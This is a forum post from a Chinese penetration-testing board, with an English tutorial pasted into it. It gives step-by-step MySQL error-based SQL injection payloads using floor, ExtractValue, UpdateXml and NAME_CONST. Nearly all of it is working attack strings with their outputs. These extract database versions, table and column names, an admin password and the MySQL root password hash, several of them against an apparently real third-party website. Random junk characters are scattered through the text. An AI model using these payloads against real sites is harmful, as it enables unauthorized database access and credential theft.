中国网络渗透测试联盟

标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法 [打印本页]

作者: admin    时间: 2015-11-11 19:03
标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:
7 ]' ~- {# ~& X# r$ y2 I首先进行正常查询:

mysql> select * from article where id = 1;
' g4 g! b  I3 C- d9 j' r/ v+—-+——-+———+
3 k1 K/ ?0 z# z" J2 @6 {# w| id | title | content |
' @. M5 @- U9 S( u& B+—-+——-+———+; b7 m; U/ ?1 _1 ?9 O2 Y6 _- L& O
|  1 | test  | do it   |3 U( n3 s1 E: r3 c; v
+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
6 C! n. p: @9 L8 i$ q+ M% pERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。* v/ M9 c! H7 p; A  O! `
例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
( v& Q  \% ]# Z+ x: _ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));' K4 I. e1 }! k, a1 s( z
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
/ F/ I/ u- I* O1 u! q4 a; ~测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–3 G' A$ I# w8 z/ d) n/ B
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’


8 I: q& e6 f4 e- z. y* |3 r; x, O6 L0 x1 g7 ]. Q; O1 L; u2 S6 h

再收集:

# o6 ^" p  q6 F+ f, [5 ~) z
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) : d3 [5 e0 r- F& Y# U

9 ~. L" ]. {  b0 u) \. q8 o8 {Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’& C2 m3 Y, P. ]! @" h$ _
+ [( E& k# c' q
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
+ j! {: c% A: U) x
, m/ }: y$ l; O+ P! L* LErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
( q/ @4 x1 U0 ^2 U9 d' y9 {
3 v- H  l# a4 z/ F  hMYSQL高版本报错注入技巧-利用NAME_CONST注入% f, x7 G5 }4 W4 u2 E$ |+ U
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
/ b, \* N) n: l4 N( c* S- {' F0 h1 d! O7 u- d- N6 a2 _

9 M8 Q6 B" q9 T# b1 {$ j相关信息
6 V. n( {( L2 U& I9 \% S
3 M9 Z; `+ G9 _2 Z, {- [2 p2 vNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
# {0 f; I+ E5 d5 [5 }( m: F
, H1 g; B6 P8 c; j! M3 N0 A: YCode:
) \6 d. ~5 l/ W. H  BNAME_CONST(DATA, VALUE)/ o1 c9 T& \/ `* V6 [# P

: M5 C4 v' f9 G) z5 i. x: J3 mReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.7 V4 L/ _2 \- \# G) z# L0 m: Z

! ?$ ]* B5 f6 I% N8 W" ], ESELECT NAME_CONST('TEST', 1)! a3 o8 [7 o7 I

. b$ h/ F/ m; m  `+ L. w  Z2 _$ |# N( X! M- \2 M: f

: P7 s& {! @% E0 Z- }|---------------|
! V/ N4 @, Q( X0 o|     TEST      |
. e, C# o# T) K8 \$ |1 k|               |
% q' p3 x6 K% E  f! w6 S5 V3 O|---------------|
& `+ P) I' ^' q9 I|       1       |. Z/ l) n8 h" u& M9 i8 N( Z
|               |
. Y5 `6 w$ a5 t# E: E|---------------|: J2 j  e2 G. W" j& t0 S

' K. H. ]& H6 p' A3 k3 m: `& a
: d  n' [% o+ S' I" Z0 |9 C1 F% `: T# {! J# z% c) @) K
( n0 k+ d( W! W; p
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
6 v6 J" L* U0 l# o" ^: U# kIntro to MySQL Variables2 \+ ~2 }, \" \4 F
& w6 l7 D3 c  ?, e
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.( k1 H# S4 B! N9 W6 d# m
3 ?: D2 n- o; t; C
Code:
1 e$ {6 D/ m% A6 ?7 n- n2 ~http://www.baido.hk/qcwh/content ... ;sid=19&cid=261" k! h7 V% u, @

7 c. A. G4 h0 ]4 p$ K

- u# D8 r( C2 Y2 Q5 B2 _$ S
! [  |: W' w1 d9 p# @  s

! F- N2 i/ E' N. g1 X; y% ^+ ^9 a2 e" _4 H% w+ \; N* n
Code:
% g8 r: A$ \6 O( B  E  D  dand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--$ y, j! w+ v  R; q
  y4 u% Q& d) p0 s
7 H! T) x% T* L4 K% W- D
VAR = Your MySQL variable.$ t  G6 U4 a) }1 `8 ~4 q- i
) @3 J9 ~8 U' z5 b4 G/ {
MySQL 5.1.3 Server System Variables7 x/ e6 M1 k; {9 J; L9 r) A. v, k
# {, E. U' U! U6 x! E: x& O, c
Let's try it out on my site..3 u3 h0 p9 D5 Z' O! t( K6 l7 R
: V' F, }2 W, l3 H/ h
Code:  H5 C% C) j* d  B
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
) F- `, P5 m' M0 p. n& ~1 k
0 z* j8 I9 R. d) L. w3 BErroruplicate column name '5.0.27-community-nt'  r$ {  D$ R, p0 |
3 d( g- E3 V% W
% u4 z0 Q+ K; k- W* e
1 z" _. ~, m( x2 W& U. g4 o
1 M3 Y5 k1 N) f- G) h: C  ?4 r: H* ~

/ [+ r# V* a/ P9 \Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...% f" Q. [& ]5 o5 V7 H

: b# s! }- O- m" v3 d8 O5 IData Extraction
. P4 g% K, f$ p! Q% h& K' C! G5 k5 s6 t
Code:1 T# t8 @5 _; z6 K$ D
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--0 O5 r# @" |/ R# l  S) X( u: ~5 R
- j9 Q$ ?1 Z% D4 E; [' {; ?" r/ ]" F
1 k3 V& h0 }6 ?5 B  m
We should get a duplicate column 1 error...
  }- a9 ^& ?* A6 T. J) Q: t
0 j4 x# T- B" ]; UCode:9 u4 p( m4 O1 [7 Y5 @. c
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
' Y$ e, Q( {. Y) B5 }3 r0 J  |5 C; J6 w! w* W
Erroruplicate column name '1
1 N- J- \- q+ g' F4 u

  ?+ r. |, E9 j7 V/ z, F( U4 S
) _# Z1 H2 s5 h6 v( E7 g0 H. J& |1 s
0 n8 e7 r; W2 k2 l
* `* P' t4 c! C' o. ]( J2 m

- L5 b7 Z. Z+ ?' w6 _% q- zNow let's get the tables out this bitch..
6 g$ R$ w) b: y5 N
0 @( e' t3 X" ~' `2 qCode:3 {( C! q3 p! b. [3 e& |
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--9 O( T& f: ]4 v. `8 T* D
* O6 R- k$ T5 Z$ u* z8 Z7 x3 f
6 v+ H# l$ c4 Q, @
Let's see if it works here, if it does, we can go on and finish the job.) q2 o9 }- S, x- L3 y, S8 M$ Z0 Z

0 ~3 d. p: h. r; U# K- i+ N4 aCode:
$ B1 q7 _. W& @* s. z) Whttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
: y2 v; ]) N- ]$ v: f
% W( m6 ]# F  R8 m4 j( g: Y- v6 l& a
Erroruplicate column name 'com_admanage3 O8 P8 S4 o- \: B
/ q! s6 w* G  O2 s
. b2 V! q3 {3 b0 v3 Q
$ n, E. ?' P2 ?
! _9 v& M# v3 ]
" i' J5 d. T2 w6 L, `4 h3 a& m3 I
3 }" F- k* v, Y: z* P
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
  S8 @7 P$ r8 l6 I  F" K! D- @! \. ]8 [' J4 Q4 m
Let's get the columns out of the user table..8 q1 u! w% E, M4 R
) c+ w1 A4 H; o7 Q) G2 N
Code:
$ L2 m% g& H6 \+ ?  L) n+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--9 v* x6 r8 y. [

+ b( C" T4 J: ~
! |; ~$ b" s2 H' P; VSo mine looks like this, and I get the duplicate column name 'Host'.
. g$ W4 w% \' x0 P% i1 i- _0 v; m0 Y  R" e
Code:
, g  K5 Y1 {& u' L- J; Whttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
. T3 P! d* j9 a% r9 @' T! c
% Z7 u  Y) n: j4 \2 [9 v2 J: FErroruplicate column name 'Host'
! W+ K' V; s$ N, ~" i5 c  h1 s7 `
/ W: \# z& `7 |5 {8 ?3 r" Q7 y
9 b. k+ W3 I7 ~( m$ b

9 g; w1 }6 e1 q) b. F- I# k' t* H; o) _$ H/ x, R; J0 F+ x  t3 s5 l1 k

/ H: l+ T( J; v! m& U- c$ F, ]: S$ @1 `3 n! d( E
Woot, time to finish this bitch off.& `  G& O; W1 b. R; D

) @- ?, y3 i0 _+ d3 k1 sCode:
! d3 [' k& o: R+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--# q$ r1 \# l) C8 c  j5 R

1 L6 N& q% `+ N6 L* c
) Q) M# [" O+ dSo mine looks like this...
- D9 @) U2 ]  P: r! a; [! \) {, C% U8 k3 R
Code:2 t( L6 n4 ]4 {) U, W2 x
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--4 @4 q' Q. H) \: |  i! ~. L# ~
7 G2 B3 }8 E+ A4 s& z
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
, U  q) J. Z  R# i: v
6 o3 U8 N4 b) K8 n
# L! B* Q4 K% I9 M7 M  W! o
# F7 K/ \# L4 H7 V4 d3 \0 ~" \

9 z' P9 }- J" R- X. n# t

2 T- T+ Z5 |" }: i- e8 Q, y
; J" y' x1 y: i; WAnd there we have it, thanks for reading.

( U: p" h# f/ X- `& ?
9 [" ?; o0 @& w




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2